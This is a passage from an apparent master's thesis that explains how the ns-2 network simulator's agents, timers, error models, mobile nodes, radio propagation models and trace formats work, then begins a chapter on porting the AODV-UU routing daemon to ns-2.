between the two agents. However, the nodes to which the agents are attached need also be connected to each other, e.g. by a duplex link. 37 47 Application attachment Agents allow applications to be attached on top of them. For this purpose, ns-2 offers a simple API for interaction between agents and applications. However, this API lacks support for passing data between applications; it only offers notifications of received data and completed data transmission to the application. Hence, the application API is only used by relatively simple applications, such as traffic generators, FTP applications and Telnet applications. This API shortcoming has also resulted in agents partially taking over the role of applications. That is, when custom packet processing functionality is to be implemented in a node, that functionality is often put into an agent Creating a new agent When creating a new agent, e.g. a routing agent, a number of steps have to be followed in order to make the agent available to the ns-2 environment. The following steps are fundamental: The inheritance structure of the agent should be decided on. The Agent class forms a foundation for agents, but multiple inheritance may be desired, depending on the functionality of the agent. The void recv(packet *p, Handler *h) procedure for packet reception should be defined. Any necessary timer classes should be defined if the agent utilizes timers for its operation. The void timeout(int tno) method of the Agent class may be overridden to provide a custom timeout method; it is empty and unused by default. More information on timers can be found in section OTcl linkage functions should be defined to allow agent usage from the OTcl environment of ns-2. The source code of the agent must be incorporated into the source code tree of ns-2, and ns-2 recompiled for the changes to take effect. OTcl linkage Linkage of the agent to the OTcl environment is performed in three steps. First, a mapping between the OTcl name space and the name of the agent class must be established. This is done by creating a static TclClass class instance whose constructor registers the name of the agent class with OTcl, and allows for creation of the agent: static class ExampleAgentClass : public TclClass { public: ExampleAgentClass() : TclClass("Agent/Example") {} TclObject *create(int argc, const char*const* argv) { return (new ExampleAgent()); } } class_example; This allows the agent to be instantiated from OTcl. Next, binding of variables should be performed to allow these to be accessed from the OTcl environment. This is done by using the bind() method: ExampleAgent::ExampleAgent() : Agent(PT_EXAMPLE) { bind("packetsize_", &size_); } In this example, the size_ variable of the ExampleAgent class is bound so that it becomes accessible from OTcl as packetsize_. Values of bound variables are automatically kept consistent between the C++ and OTcl environment. The argument to the constructor of the Agent base class is the packet type that should used by the agent when generating packets. 38 48 Finally, the agent should be capable of receiving commands from the OTcl environment, e.g. to start or stop the agent or to modify its behavior in other ways. This is done by overriding the Agent::command() method: int ExampleAgent::command(int argc, const char*const* argv) { if (argc == 2) { if (strcmp(argv[1], "start") == 0) { startagent(); return TCL_OK; } } } // Unknown command return (Agent::command(argc, argv)); Here, three things should be noted: The number of arguments passed to the command() method is one more than the number of arguments passed to the agent instance by the OTcl simulation scenario script. If the agent is given a start command by issuing $agent start from OTcl, the command() method of the agent will receive not one but two arguments, of which the first one is cmd. This must be considered when checking the argument count and extracting parameters from the argument array. A special return value, TCL_OK or TCL_ERROR, must be returned by the command() method. This provides the OTcl interpreter with information on the status of the command. If TCL_OK is returned, execution of the OTcl simulation scenario script continues as usual, but if TCL_ERROR is returned, the simulator will exit with an error message pointing out where things went wrong. If the agent cannot handle the command given to it through the command() method, it should pass the argument count and arguments on to the Agent base class for processing. The agent should return the return value of the Agent::command() method. Compilation For the agent to become available to ns-2, its source code must be integrated into the ns-2 source code tree, and ns-2 recompiled. This is preferrably done by modifying the Makefile.in file of ns-2, which serves as a template for the configure tool of the system when it creates a Makefile for compilation on that specific system. The target object (.o) files of the agent should be added among the other compilation prerequisites, so that the agent is compiled together with the rest of the ns-2 source code. Finally, configure should be run from the ns-2 directory with Makefile.in in it to produce a new Makefile. Running make should then recompile the necessary parts of the ns-2 source code tree, and include support for the newly created agent Timers Timers are used by agents and other objects in ns-2 for keeping track of delays and performing periodic executions of program code. They may be implemented in either C++ or OTcl, and rely on the scheduler of ns-2 for their notion of time. In this section, we will consider C++ timers only. The source code can be found in ns/ common/timer-handler.{cc, h}. For C++ timers, the abstract base class TimerHandler should be used. A void expire(event *e) method must be defined by subclasses, containing the code to be performed when the timer expires. Additional 39 49 tweaking of timer behavior is available by overriding the void handle(event *e) method, which normally consumes the timer event, calls expire(), and sets the status of the timer appropriately. Timers of the TimerHandler class offer the following functionality through public member functions: void sched(double delay) schedules the timer to expire delay seconds in the future. void resched(double delay) reschedules the timer to expire delay seconds in the future. In contrast to the sched() method, the timer may be pending. void cancel() cancels the timer (if it is pending). int status() returns the current status of the timer, i.e., one of TIMER_IDLE, TIMER_PENDING and TIMER_HANDLING. Since timers are frequently used by agents, it is very common to see constructors of timer classes taking a pointer to an agent as an argument. This pointer can be stored by the timer and later dereferenced to gain access to methods of that agent class. Similarly, timer classes are often made friends of an agent class to allow them to access protected methods which otherwise would be inaccessible Traffic generators Traffic generators are special applications that generate simulated network traffic. They should be attached to a transport agent, e.g. a TCP agent, for sending the generated traffic. Currently, four traffic generators are available: Application/Traffic/Exponential generates bursts of traffic, with burst and idle times of exponential distributions. Application/Traffic/Pareto generates bursts of traffic, with burst and idle times of pareto distributions. Application/Traffic/CBR generates constant bit-rate traffic, allowing the bit rate and packet size to be configured. Application/Traffic/Trace is used for generating traffic based on trace files from existing simulations. This traffic generator selects a random starting place in the trace file, from which it begins to generate traffic Error models Error models are connectors, used for introducing link-level packet errors or packet loss into a simulation. Errors are modeled by setting the error_ flag of packets, and packet loss is modeled by dropping packets to a drop target. Some of the most common error models are described below. The source code can be found in ns/ queue/errmodel.{cc, h}. ErrorModel: This is the base error model. It allows the unit of error to be changed to bits or packets, and the random variable for error probability to be specified. If a drop target has been set, it will receive all corrupted packets. Otherwise corrupted packets are passed on to the target of the error model, allowing errors to be handled at the receiving node. Multi-state error model: This error model uses state transitions for changing between different error models. Such transitions occur according to a transition state model matrix, specifying the probabilities of switching from one error model to another. 40 50 Two-state error model: This error model introduces errors (or not), depending on the current state of the error model. List error model: This error model drops packets or bytes based on their sequence numbers. Periodic error model: This error model switches between errors and no errors periodically. SelectErrorModel: This error model drops packets of a certain type when the unique ID of a packet has a value with a certain offset from a cycle value Usage in wired networks To use an error model in a wired network, it has to be inserted into a simple link. Since simple links are compound objects, error models may be inserted at several different places: Before the queue of the link. This can be done either with the errormodule <errmod> method of a simple link, which inserts the error model right before the queue of the link and sets the drop target of the error model to be the drop target of the link, or with the lossmodel <errmod> <src> <dst> method of the simulator instance, which inserts the error model into the simple link between the specified source and destination. After the queue of a link, but before the delay element. This can be done either with the insertlinkloss <args> method of a simple link or the link-lossmodel <errmod> <src> <dst> method of the simulator instance. These two methods work just like the errormodule and lossmodel methods described above, except for the placement of the error model. After the delay element of a link. This can be done with the install-error method of the Link class. This currently does not produce any trace, but is included for future extensions Usage in wireless networks In wireless networks (described in section 5.15), error models can be applied both to incoming and outgoing network traffic on a wireless channel. The error models are placed between the network interface and the MAC layer of the network stack, and allow incoming and outgoing packets to be corrupted independently. Installation of error models in a wireless node is performed through the node-config command of the simulator instance, as described in section More specifically, the parameters -IncomingErrProc and -OutgoingErrProc to the node-config command should specify OTcl methods that return error model instances, as shown below. proc ExampleErrProc{} { set err [new ErrorModel] $err set rate_ 0.01 $err drop-target [new Agent/Null] return $err } $ns_ node-config -IncomingErrProc ExampleErrProc \ -OutgoingErrProc ExampleErrProc set node1_ [$ns_ node] set node2_ [$ns_ node]... In this example, a standard ErrorModel instance is created for both the incoming and outgoing wireless channel of each node, with a packet error rate of one percent. Corrupted packets will be sent to a null agent that discards them, instead of to the MAC layer or network interface (depending on the packet direction). 41 51 5.15 Mobile networking Mobile networking in ns-2 is based on the mobility extensions [44] developed by the CMU Monarch group [45]. These extensions introduce the notion of mobile nodes connected to wireless channels, and allow for simulation of wireless networks and ad-hoc networks Mobile nodes A mobile node is a node with extra functionality to adapt it to mobile networking. Figure 5.7 shows the schematics of a mobile node, with an additional agent attached (for packet generation and processing). Agent Node Entry Address Classifier Port Classifier defaulttarget_ 255 Routing Agent target_ uptarget_ Link Layer arptable_ ARP downtarget_ Interface Queue downtarget_ mac_ MAC uptarget_ uptarget_ downtarget_ Radio Propagation Model propagation_ Network Interface channel_ Wireless Channel uptarget_ Figure 5.7: Schematics of a mobile node in ns-2 The most important difference between wired nodes and mobile nodes is that mobile nodes are connected to wireless channels for their communication, whereas wired nodes are connected by links. Also, mobile nodes may be moved within a topography, as opposed to wired nodes which remain stationary. The mobile node itself is a compound object, built from the following parts: An address classifier used for handing packets to the port classifier or routing agent. The default target of the address classifier is often the routing agent, to allow for packet forwarding. A port classifier, used for handing packets to agents attached to the mobile node. 42 52 A routing agent for routing table management and packet forwarding. The routing agent should set the next_hop_ field of packets to indicate their next-hop destination. A link layer responsible for converting network addresses to hardware addresses (with the help of an ARP module, see below) and preparing packets to be put onto a wireless channel. An ARP module that resolves network addresses to hardware (MAC) addresses. An interface queue, used for storing packets that should be sent out. A MAC layer for managing access to the wireless channel. A network interface that sends and receives packets over the wireless channel. A radio propagation model determining the signal strength of received packets, and hence, whether a packet can be received by a network interface or not. A wireless channel over which packets are distributed Packet transmission Packets are transmitted by a mobile node in the following way. The packet is first generated by an agent or a traffic source at the mobile node. Each generated packet is delivered to the entry of the mobile node, i.e., the address classifier. This classifier determines if the packet was destined for the current node, or if it should be forwarded. Packets that should be forwarded are handed to the routing agent of the mobile node through a default target of the address classifier. The routing agent processes the packet, fills in the next_hop field of the packet, and passes it down to the link layer. The link layer translates the destination address into a hardware (MAC) address, by letting an ARP module generate ARP requests, process ARP replies and fill in the MAC header of the packet. The packet is then handed down to the interface queue, which holds packets that should be transmitted. The length of the interface queue can be specified, and depending on the queue type used, routing protocol control packets can be prioritized. The MAC layer retrieves packets from the interface queue when appropriate, i.e., when the wireless channel is free to use. Packets are handed to the network interface, which puts the packet onto the wireless channel. Copies of the packet are then delivered to all network interfaces attached to the channel, at the time when a packet would start arriving in a physical system (i.e., based on the speed of light and the distance between nodes). However, this does not necessarily mean that the packet can be correctly received by all of them; radio propagation models determine this at the time of packet reception Packet reception When a packet is received by a network interface attached to a wireless channel, the network interface consults a radio propagation model for determining whether the packet can be correctly received or not. The settings of the network interface and the selected radio propagation model affect this (see sections 5.16 and 5.17). If a packet is correctly received, it is handed to the MAC layer by the network interface. The MAC layer hands the packet to the link layer, which in turn hands the packet to the entry of the mobile node, i.e., the address classifier. The address classifier checks the destination address of the packet to see if it matches the address of the current node. If it does, the packet is handed to the port classifier. Otherwise, the packet is handed to a default target usually the routing agent for further processing and possible forwarding. The port classifier hands the packet to an agent attached to the mobile node, based on the port number contained in the packet. This completes the packet delivery. 43 53 Simulation scenario setup The setup of a simulation scenario with mobile nodes differs somewhat from a simulation scenario with wired nodes. The following steps should be performed, in addition to those of section 5.2.2, to create a simulation with mobile nodes: Wireless tracing should be enabled for NAM (Network Animator) to track movements of mobile nodes. This is described in section A topography must be defined, to confine the area in which mobile nodes may move. A flat grid topography with dimensions x times y metres is created with the following code: set topo [new Topography] $topo load_flatgrid $x $y The topography instance should be passed to the mobile node with the -topoinstance option of the node-config command (see section 5.7.2). Optionally, a third argument may be passed to the load_flatgrid command; the resolution of the grid. The default resolution is 1. A GOD (General Operations Director) object must be created. It annotates trace logs with information about the optimal number of hops from a source to a destination, used for statistics and routing protocol evaluations. A GOD object is created with the following code (nn is the total number of nodes in the simulation, and must be specified): set god_ [create-god $nn] If desired, the Queue/DropTail/PriQueue queue (commonly used as an interface queue) can be set to prioritize routing protocol control packets. This is done by changing the value of its Prefer_ Routing_Protocols variable: Queue/DropTail/PriQueue set Prefer_Routing_Protocols 1 The physical characteristics of the network interface should be set, along with configuration of the MAC layer to suit the simulation. This is decribed in section Mobile node configuration and creation Mobile nodes are configured and created as usual by issuing the commands node-config and node to the simulator instance. However, after creating a mobile node, one has to disable the random motion feature of the node to prevent it from performing random movements on its own: set mobilenode_ [$ns_ node] $mobilenode_ random-motion Mobile node movements Mobile nodes may be moved within the topography of the simulation, and keep track of their current positions. Currently, movements are only possible in two dimensions (X and Y), although node positions and movements include a third (Z) value, which is ignored. This limitation implies that flat grid topologies currently are the only meaningful topologies in ns-2 simulations. 44 54 Initial positioning The initial position of a mobile node is specified by setting its X_, Y_ and Z_ instance variables: $mobilenode_ set X_ 10.0 $mobilenode_ set Y_ 20.0 $mobilenode_ set Z_ 0.0 For NAM (Network Animator) to be able to correctly place and draw nodes in a visualization of a simulation, all nodes must be passed to the simulator instance through an initial_node_pos <node> <size> command, where node is a mobile node and size is the desired node size in NAM: $ns_ initial_node_pos $mobilenode1_ 10 $ns_ initial_node_pos $mobilenode2_ Movement commands Mobile node movements are performed through the setdest command, which takes the desired x and y coordinates and a velocity (measured in m/s) as arguments. If one wishes to move the mobile node to these coordinates in a certain time, the velocity for doing so has to be calculated manually. $mobilenode_ setdest <x> <y> <velocity> Random motion Random motion can be used by issuing the random-motion 1 command to a mobile node. This command will cause the mobile node to perform motions according to a random-waypoint model [2] as soon as the node is given a start command. In such a model, the node performs movements in random directions with pauses in between. Movement pattern files It is also possible to move mobile nodes according to a movement pattern file. Such a file contains OTcl code with setdest movement commands scheduled at appropriate times, and may be generated either manually or with the setdest utility of the ns-2 distribution. A movement pattern file can easily be included in a simulation scenario script by asking the OTcl interpreter to source it, using the source "movement.tcl" command. This includes the specified file as if its contents had been inserted at that line, and allows for easy switching between different movement patterns while keeping the main parts of a simulation scenario script unchanged Routing in mobile networking Routing in mobile nodes is very different from routing in wired nodes. In a wired node, a routing module maintains a routing table, which is used by route logic to perform route computations (see section 5.7.4). These computations are then used by the classifiers of a node to find a wired link to forward packets on. In mobile nodes, the routing agent takes on all the responsibility for routing and forwarding. No routing table is kept in the mobile node itself; instead, the routing agent has to maintain such a routing table internally. No separate route logic is available to perform route computations; this has to be performed by the routing agent. Also, computed routes are not installed by modifying an address classifier. Instead, the address classifier usually has the routing agent set as its default target, and the routing agent itself has to perform the packet forwarding. Finally, this forwarding does not occur over wired links, but over a wireless channel. It is the responsibility of the routing agent to fill in the next_hop_ field of each packet that should be forwarded, before handing it down to the link layer of the mobile node. 45 55 Creating a routing agent is not very different from creating any other agent; it is simply attached to a special port number (RT_PORT, i.e., 255) in the port classifier of a mobile node. However, one has to make sure that the requirements of the routing agent (and the protocol that it implements) are met. Although most routing agents are placed as the default target of the address classifier in a node, some routing algorithms may require a different placement. Currently, ns-2 includes routing agent implementations of four common routing protocols for wireless simulations; DSDV, AODV, DSR and TORA. However, the continuous updating of routing protocol specifications (and lack of up-to-date implementations) have made some of these routing agents rather obsolete. For instance, the AODV routing agent supposedly adheres to version 6 of the AODV draft, which is several years old (and definitely outdated) Miscellaneous features In addition to wireless ad-hoc networking, the mobile networking portions of ns-2 also offer support for wiredcum-wireless scenarios, where mobile nodes communicate with base stations which act as gateways to a wired network. This is the common infrastructure seen in most wireless LANs today. Furthermore, ns-2 includes support for Mobile IP [46], where mobile hosts communicate with their home network through home agents and foreign agents. Both these additions were not part of the CMU Monarch mobility extensions to ns-2, but were added later. Further documentation on wired-cum-wireless scenarios and Mobile IP can be found in [40] Radio propagation models Radio propagation models are used for calculating the received signal power of packets in wireless simulations. Based on the received signal power and thresholds, different actions may be taken for a packet. Either the signal is considered too weak, or the packet is marked as containing errors and thrown away by the MAC layer, or it is received correctly. Currently, there are three radio propagation models implemented in ns-2; the free space model, the two-ray ground reflection model and the shadowing model. Originally, all these models come from the domains of radio engineering and physics Free space model The free space model [47], Propagation/FreeSpace, assumes a single, clear line-of-sight path between the transmitting and receiving nodes. It uses the formula in Equation 5.1 to calculate the received signal power at a distance from the transmitter. (5.1) In this formula, is the transmitted signal power, is the antenna gain of the transmitter, is the antenna gain of the receiver, is the system loss and is the wavelength. In ns-2 simulations, it is very common to select and. Usage Mobile nodes can be configured to use the free space model by issuing the node-config command of the simulator instance with the -proptype option set as follows (prior to node creation): $ns_ node-config -proptype Propagation/FreeSpace 46 56 Two-ray ground reflection model The two-ray ground reflection model, Propagation/TwoRayGround, considers not only a single lineof-sight path between nodes but also ground reflection. This model has shown [48] to give more accurate predictions of the received power at long distances than the free space model. It uses the formula in Equation 5.2 to calculate the received signal power at a distance from the transmitter. (5.2) In this formula, is the transmitted signal power, is the antenna gain of the transmitter, is the antenna gain of the receiver, is the system loss, is the height of the transmitting antenna and is the height of the receiving antenna. However, at short distances, the two-ray ground reflection model does not give particularly good results due to oscillations caused by the combinations of the two rays. Therefore, the two-ray ground reflection model in ns-2 calculates a crossover distance,, for automatically switching between the free space model and the two-ray ground reflection model. The formula for the crossover distance is shown in Equation 5.3 ( is the wavelength). When, the free space model (Equation 5.1) is used. When, the two-ray ground reflection model (Equation 5.2) is used instead, since both models give the same results for. Usage Mobile nodes can be configured to use the two-ray ground reflection model by issuing the node-config command of the simulator instance with the -proptype option set as follows (prior to node creation): $ns_ node-config -proptype Propagation/TwoRayGround Shadowing model The shadowing model [48], Propagation/Shadowing, attempts to more realistically model multi-path propagation effects, i.e., fading. This model has two parts; a path loss model, which predicts the mean received signal power at the distance from the transmitter, and a log-normal random variable, which models probabilistic communication between nodes at the edge of the radio range. The formula for the shadowing model is shown in Equation 5.4. (5.4) (5.3) In this log-normal shadowing model formula, is the received signal power at the reference distance, is the received signal power at the distance and is a Gaussian random variable with zero mean and standard deviation. is called the path loss exponent and the shadowing deviation. These two values need to be set to determine the characteristics of the shadowing model. Some typical values are shown in Tables 5.4 and 57 Table 5.4: Typical path loss exponent ( ) values " Outdoor, free space 2 Outdoor, shadowed urban area Indoor, line-of-sight Indoor, obstructed area 4-6 Table 5.5: Typical shadowing deviation ( ) values " (db) Outdoor 4-12 Office, hard partition 7 Office, soft partition 9.6 Factory building, line-of-sight 3-6 Factory building, obstructed 6.8 Usage Mobile nodes can be configured to use the shadowing model by setting its parameters and then issuing the node-config command of the simulator instance as follows (prior to node creation): Propagation/Shadowing set pathlossexp_ 1.8 Propagation/Shadowing set std_db_ 4.0 Propagation/Shadowing set dist0_ 1.0 Propagation/Shadowing set seed_ 0 ;# path loss exponent ;# shadowing deviation (db) ;# reference distance (m) ;# RNG seed $ns_ node-config -proptype Propagation/Shadowing This uses the specified seed value for the random number generator. If one wishes to use another seeding method, this has to be specified, and the propagation instance passed to the node-config command: set prop [new Propagation/Shadowing] $prop set pathlossexp_ 1.8 $prop set std_db_ 4.0 $prop set dist0_ 1.0 $prop seed <seed-type> 0 $ns_ node-config -propinstance $prop ;# seeding method (and value) ;# pass propagation instance The (seed-type) seeding method parameter should be one of predef, raw and heuristic. A predefined seed provides a set of known good seeds, while a raw seed uses the extra parameter for specifying the seed value. These two seeding methods yield a deterministic behavior. Finally, a heuristic seed uses the current time and a counter to generate a seed, and hence, yields a non-deterministic behavior Communication range adjustment Adjustment of the communication range in wireless networking is done in two steps. First, the characteristics of the network interface have to be set. This is typically done using technical specifications of a wireless network interface as a reference. Second, a receive threshold has to be calculated, based on the characteristics of the network interface and the selected radio propagation model. 48 58 Network interface characteristics The parameters of the Phy/WirelessPhy network interface that need to be set are the following: Pt_, the transmission power in W (Watts). freq_, the frequency used for wireless communication. CPThresh_, the capture threshold. This value determines how much stronger a radio signal must be than one currently being received for capture to occur. It is measured in db. CSThresh_, the carrier sense threshold. This value determines the minimal received power in W needed for the network interface to detect a transmission from another node. L_, the system loss. Normally set to 1.0. RXThresh_, the receive threshold. This value determines the minimal received power in W to be able to receive a packet. Calculation of this value is described below. bandwidth_, the bandwidth of the network interface. This does not affect the communication range, but should be set appropriately anyway. Since signal powers are commonly measured in dbm (db compared to 1 mw), the conversion formulas of Equations 5.5 and 5.6, from [49], could be useful during calculation of these values. (5.5) (5.6) Receive threshold calculation The receive threshold of the network interface is calculated by supplying its parameters, the radio propagation model and possibly parameters of the radio propagation model to a threshold utility that is part of the ns-2 distribution. This utility has the following syntax: threshold -m <propagation-model> [options] <distance> The propagation-model should be FreeSpace, TwoRayGround or Shadowing. The communication range, distance, is measured in metres. The additional options depend on which radio propagation model that is used. The available options are listed below. -Pt <transmit-power> sets the transmission power, corresponding to Pt_ of the network interface. -fr <frequency> sets the frequency, corresponding to freq_ of the network interface. -Gt <transmit-antenna-gain> sets the gain of the transmitting antenna. -Gr <receive-antenna-gain> sets the gain of the receiving antenna. -L <system-loss> sets the system loss, corresponding to L_ of the network interface. -ht <transmit-height> sets the height of the transmitting antenna. -hr <receive-height> sets the height of the receiving antenna. -pl <path-loss-exponent> sets the path loss exponent (for the shadowing model). 49 59 -std <shadowing-deviation> sets the shadowing deviation (for the shadowing model). -d0 <reference-dist> sets the reference distance (for the shadowing model). It is important to check the output of the threshold utility to verify that all values are correct, since it assigns values for an ancient Lucent WaveLAN wireless network interface as default values. Finally, the RXThresh_ value given by the threshold utility should be set in the simulation scenario script along with the other settings of the network interface. A complete example is given below, where also the data rates of the MAC layer are configured. The radio propagation model used for calculating the receive threshold in this example is the two-ray ground reflection model, and the values shown yield a communication range of 22.5 metres. Phy/WirelessPhy set Pt_ Phy/WirelessPhy set bandwidth_ 11Mb Mac/802_11 set datarate_ 11Mb Mac/802_11 set basicrate_ 1Mb Phy/WirelessPhy set freq_ 2.472e9 Phy/WirelessPhy set CPThresh_ 10.0 Phy/WirelessPhy set CSThresh_ \ e-12 Phy/WirelessPhy set L_ 1.0 Phy/WirelessPhy set RXThresh_ \ e-09 ;# Tx power (W), 15 dbm ;# 11 Mbps bandwidth ;# 11 Mbps for data ;# 1 Mbps for broadcasts ;# Europe, Channel 13, GHz ;# Capture threshold (db) ;# Carrier sense threshold (W), ;# receiver sensitivity -83 dbm ;# System loss ;# Receive threshold (W), from ;# threshold utility (22.5 m) ;# given the other parameters 5.18 Trace files Trace files or trace logs are an important part of a simulation, since they provide information on the events that occured. Currently, ns-2 offers three different trace formats; an old trace format (very commonly used), a new trace format and a tagged trace format. Also, a special NAM trace format is used by NAM for its visualization of simulations Trace configuration Tracing is configured by issuing commands to the simulator instance. The following commands are available: use-newtrace selects the new trace format. use-taggedtrace selects the tagged trace format. trace-all $fd specifies that tracing should be performed to a trace file referenced by the fd file descriptor. namtrace-all $namfd specifies that tracing should be performed to a NAM trace file referenced by the namfd file descriptor. 50 60 namtrace-all-wireless $namfd <x> <y> is similar to namtrace-all, but annotates the NAM trace with information about the size of the topography (its x and y dimensions). flush-trace flushes all open traces to disk. This command should be used at the end of a simulation, before exiting the simulator. Also, the configuration of nodes heavily affects the amount of logged information. The node-config command of the simulator instance allows agent, router, MAC layer and movement tracing to be turned on or off individually (see section 5.7.2). An example usage of these commands is shown below for a wireless simulation. Both a normal trace and a NAM trace is opened, all tracing is enabled, and at the end of the simulation, the traces are flushed to disk before the simulator is halted. set val(x) 50 ;# X dimension of the topography set val(y) 15 ;# Y dimension of the topography set val(stop) ;# simulation time set tracefd [open $val(tr) w] set namtrace [open $val(nam) w] $ns_ trace-all $tracefd $ns_ namtrace-all-wireless $namtrace $val(x) $val(y) $ns_ node-config -agenttrace ON \ -routertrace ON \ -mactrace ON \ -movementtrace ON... proc finish {} { global ns_ tracefd namtrace $ns_ flush-trace close $tracefd close $namtrace $ns_ halt } $ns_ at $val(stop) "finish" Trace formats Old trace format An example of the old trace format is shown below. This format has the advantage that it is relatively easy to read, because of its formatting. Fields are grouped together to provide information from the different parts of a packet, such as the MAC header and the IP header. A description of the contents is given in Table 5.6. s _1_ RTR AODV 40 [ ] [1:255 0: ] [0x2 0 [1 0] ] (REPLY) 51 61 Table 5.6: Trace log contents (old trace format) 1 Event type. r = received, s = sent, f = forwarded, D = dropped. 2 Time of the event. 3 Node ID. 4 Type of tracing object. RTR = router, MAC = MAC layer, IFQ = interface queue, AGT = agent. 5. 6 UID (Unique ID) of the packet. 7 Packet type. 8 Packet size. 9-1 Expected time to send data. 9-2 Destination MAC address. 9-3 Source MAC address. 9-4 Type (800 = IP, 806 = ARP) IP source address Source port number IP destination address Destination port number TTL value Next hop address. 11 and up Packet-type specific trace information. New trace format An example of the new trace format is shown below. This trace format is not as easy to read as the old trace format, because of the (often) lengthy lines consisting of tag - value pairs. It is however well suited for parsing by trace log analysis utilities. A description of the most common contents is given in Table 5.7, and examples of application tags are given in Table 5.8. New tags will be introduced as new applications are added to ns-2 (if those applications choose to support the new trace format). s -t Hs 1 -Hd 0 -Ni 1 -Nx Ny Nz Ne Nl RTR -Nw --- -Ma 0 -Md 0 -Ms 0 -Mt 0 -Is Id It AODV -Il 40 -If 0 -Ii 24 -Iv 255 -P aodv -Pt 0x2 -Ph 0 -Pd 1 -Pds 0 -Pl Pc REPLY Tagged trace format This trace format was recently added to ns-2, and currently lacks documentation. It is similar to the new trace format, using tags and values, but the tag names must be determined by each object to be traced, making the coordination of tag names for this trace format more difficult. As a result, tag clashes are likely to occur. Anyone wishing to use this trace format should therefore investigate the existing tagged trace formats specified by the ns-2 tracing source code carefully. 52 62 Table 5.7: Trace log contents (new trace format) 1 Event type. r = received, s = sent, f = forwarded, D = dropped. -t Time. -t * Global setting. -Ni Node ID. -Nx X coordinate of node. -Ny Y coordinate of node. -Nz Z coordinate of node. -Ne Node energy level. -Nl Trace level (such as AGT, RTR or MAC). -Nw. -Is IP: Source address.port number -Id IP: Destination address.port number -It IP: Packet type. -Il IP: Packet size. -If IP: Flow ID. -Ii IP: UID (Unique ID) of the packet. -Iv IP: TTL value. -Hs Node ID of this node. -Hd Node ID of next hop. -Ma MAC: Duration. -Md MAC: Destination MAC address. -Ms MAC: Source MAC address. -Mt Type (800 = IP, 806 = ARP). Table 5.8: Example application-level trace log contents (new trace format) -P arp -Po ARP: ARP request/reply. -P arp -Pm ARP: Source MAC address. -P arp -Ps ARP: Source address. -P arp -Pa ARP: Destination MAC address. -P arp -Pd ARP: Destination address. -P cbr -Pi CBR: Sequence number. -P cbr -Pf CBR: Packet forwarding count. -P cbr -Po CBR: Optimal number of forwards. -P tcp -Ps TCP: Sequence number. -P tcp -Pa TCP: Acknowledgement number. -P tcp -Pf TCP: Packet forwarding count. -P tcp -Po TCP: Optimal number of forwards. 53 63 NAM trace format The NAM trace format is used by NAM (Network Animator) to visualize simulations. It is a tagged format, resembling the new trace format, and includes support for initialization, node, link, queue, agent and variable events. However, it is far too extensive to be described here. Full details on the NAM trace format can instead be found in [40] Problems encountered with ns-2 Following the in-depth review of ns-2 and its network components in the previous sections, some comments should be made regarding problems that one may encounter while using the ns-2 simulation environment. These comments are based on observations during the course of this master s thesis project, as well as several independent reports from individuals on the ns-users mailing list. Perhaps the most frequent criticism against the physical layer and MAC layer in wireless simulations is the difficulty of setting the wireless bandwidth correctly. Many reports indicate that even though the bandwidth and data rate is set to 11 Mbps, the actual throughput is limited to values far below this figure. Apparently, this issue has not been investigated thoroughly enough for a solution to be available. Another important topic, also related to wireless simulations, is the behavior of wireless broadcasts versus unicasts. The ns-2 model of the MAC layer offers separate transmission rate settings for broadcast and unicast network traffic (the basic rate and data rate, respectively), although this has no effect on the radio range of the transmission; it merely affects the time required for completing the transmission. This is also mentioned in Chapter 7, where, for this reason, some simulation results differ from real-world results. Finally, a problem related to post-run analysis and debugging should be noted. It is not uncommon for the ns-2 model of the MAC layer to drop packets without specifying any reason for doing so. Needless to say, this can make post-run analysis and interpretation of trace logs very cumbersome. Hopefully this will be rectified in a future release of ns Summary The ns-2 network simulator is the result of many years of hard work from a large number of contributors. Its modularity and flexibility has made it one of the most popular network simulators to use for research, and the support for mobile networking has contributed to its widespread usage for performing wireless and ad-hoc networking simulations. It is continuously updated with approximately one major release each year and minor versions in between, although some of its network components (most notably, routing agents) have become rather outdated due to lack of recent implementations. Since ns-2 still is under development, it should be treated as a valuable tool for conducting network simulations rather than the absolute truth. That, however, applies to all network simulators. 54 64 Chapter 6 Porting AODV-UU to ns Introduction This chapter describes the porting of AODV-UU [6] to the ns-2 network simulator [8]. The problems associated with this conversion are pointed out, a number of conversion approaches are reviewed, and finally, the actual conversion process is described. This conversion process is characterized by the ambition to use the same source code for the ported version of AODV-UU as for the conventional Linux version, to the extent this is possible. 6.2 Conversion overview Since routing in mobile nodes in ns-2 is performed by routing agents, the goal of the porting process is to create such a routing agent based on the AODV-UU source code. Each node will instantiate this routing agent, and use it for ad-hoc routing in a wireless networking scenario. Using the same source code for the ported version as for the conventional version requires a substantial amount of care; changes to the original source code should not affect AODV-UU during normal compilation. This calls for an ability to switch between the two versions, depending on whether the compilation should result in a Linux routing daemon or an ns-2 routing agent. 6.3 Initial decisions Considering that AODV-UU was written in C, which is a subset of C++, and that network objects in ns-2 performing any kind of packet processing should be implemented in C++ rather than OTcl (according to the ns-2 manual [40]), the decision was made that the porting process should result in a C++ routing agent for ns-2. It was also decided that the existing AODV routing agent of ns-2 should serve as a template during the initial construction of the AODV-UU routing agent. 6.4 Similar projects During the initial phase of this project, similar projects were searched for. There exist many routing agents for ns-2, e.g. the ones that come as part of the ns-2 distribution (see section ), but none of these are the result of porting a C implementation to C++; they were implemented in C++ from the beginning. The closest match was a C++ TORA implementation [50], with support code for running it in ns-2. However, that implementation was also written in C++ from the beginning. Because of this, focus was put on locating general material on C to C++ conversions. Several useful books and documents on this topic were found, e.g. [51], [52], [53] and [54]. These were used during the porting process. 55 65 6.5 Areas of concern In this section, different areas of concern associated with the porting process are described. This is the main analysis part of the porting process. The issues described here were found by careful examination of the AODV-UU source code [6], the ns-2 source code [8] and the ns-2 manual [40]. It is assumed that the reader is acquainted with AODV-UU (described in Chapter 4) and ns-2 (described in Chapter 5) Environmental differences The execution environments of an AODV-UU routing daemon running in Linux and a routing agent in ns-2 are very different. In Linux, a single instance of the AODV-UU routing daemon is executed on each host, and uses a physical wireless network interface for its communication. In ns-2, routing agents are instantiated for each node in the simulation. All routing agent instances execute in the same environment, i.e., they all run on the same host, and hence must be able to co-exist without interfering with each other. Furthermore, routing agents do not have access to a real physical wireless network interface Network interfaces The AODV-UU routing daemon retrieves information about network interfaces during its initialization in the main module. For each network interface, the IP address, name, netmask and broadcast address is retrieved. No such information is kept for network interfaces (e.g. the Phy/WirelessPhy network interface) in ns-2. Instead, all addressing information is kept in each node, and packets carry all the information needed for transmission. Furthermore, support for multiple network interfaces and multiple wireless channels is still somewhat experimental in ns-2, and most routing agents do not support such operation Packet handling Packet reception The packet handling of the AODV-UU routing daemon can be divided into two parts; handling of AODV routing protocol control packets and handling of data packets. AODV control packets are received by the 